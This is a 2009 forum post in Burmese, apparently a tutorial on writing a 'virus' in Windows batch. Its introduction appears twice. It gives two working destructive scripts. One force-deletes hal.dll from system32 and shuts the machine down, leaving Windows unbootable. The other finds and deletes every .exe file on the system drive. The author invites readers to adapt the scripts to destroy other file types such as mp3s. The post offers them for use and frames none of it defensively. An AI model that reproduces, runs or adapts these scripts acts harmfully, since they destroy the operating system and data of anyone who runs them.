1 Virus ေရးမယ္ (Batch programming ျဖင့္) 26th December 2009, 12:08 pm
z3r0c00l
Administrator
အခုကၽြန္ေတာ္ Virus ကို Batch Programming နဲ႕ေရးနည္းစတင္မွာျဖစ္ပါတယ္။ တတ္သိလြန္းလို႔မဟုတ္ပါဘူး။ နည္းနည္းေလးသိတာကို Share လုပ္တာပါ။
ကၽြန္ေတာ့ထက္ပိုသိတဲ့သူေတြ ေဆြးေႏြးေပးၾကပါဦး။ Connection အေျခအေနေၾကာင့္ ပုိ႔စ္ေတြခြဲၿပီးတင္လုိက္ပါတယ္။ စိတ္မရွိၾကပါနဲ႕။ အခုကၽြန္ေတာ္ေရးထားတာေတြကို
ခ်ဲ႕ထြင္ၿပီး သံုးလို႔ရပါေသးတယ္။ (ဥပမာ - ကၽြန္ေတာ္က Exe File ဖ်က္တာကိုေရးတယ္။ စာဖတ္သူတို႔အေနနဲ႕ mp3 file ဖ်က္တာကိုေရးလို႔ရတယ္။ Same too)
ကဲ....ကၽြန္ေတာ္တို႔စလိုက္ရေအာင္--------------------------------
******************************************************************************************************************
1. Del hal.dll (hal.dll File ကိုဖ်က္ရန္။)
2. Del *.exe File (Exe File အားလံုးကိုဖ်က္ရန္။)
ကၽြန္ေတာ့ထက္ပိုသိတဲ့သူေတြ ေဆြးေႏြးေပးၾကပါဦး။ Connection အေျခအေနေၾကာင့္ ပုိ႔စ္ေတြခြဲၿပီးတင္လုိက္ပါတယ္။ စိတ္မရွိၾကပါနဲ႕။ အခုကၽြန္ေတာ္ေရးထားတာေတြကို
ခ်ဲ႕ထြင္ၿပီး သံုးလို႔ရပါေသးတယ္။ (ဥပမာ - ကၽြန္ေတာ္က Exe File ဖ်က္တာကိုေရးတယ္။ စာဖတ္သူတို႔အေနနဲ႕ mp3 file ဖ်က္တာကိုေရးလို႔ရတယ္။ Same too)
ကဲ....ကၽြန္ေတာ္တို႔စလိုက္ရေအာင္--------------------------------
******************************************************************************************************************
1. Del hal.dll (hal.dll File ကိုဖ်က္ရန္။)
- Code:
@echo off
rem ---------------------------------
rem Disable Computer By Deleting hal.dll
del /f /q %SystemDrive%\WINDOWS\system32\hal.dll
shutdown /s /t 00
rem ---------------------------------
2. Del *.exe File (Exe File အားလံုးကိုဖ်က္ရန္။)
- Code:
@echo off
rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------
Last edited by z3r0c00l on 26th December 2009, 12:32 pm; edited 2 times in total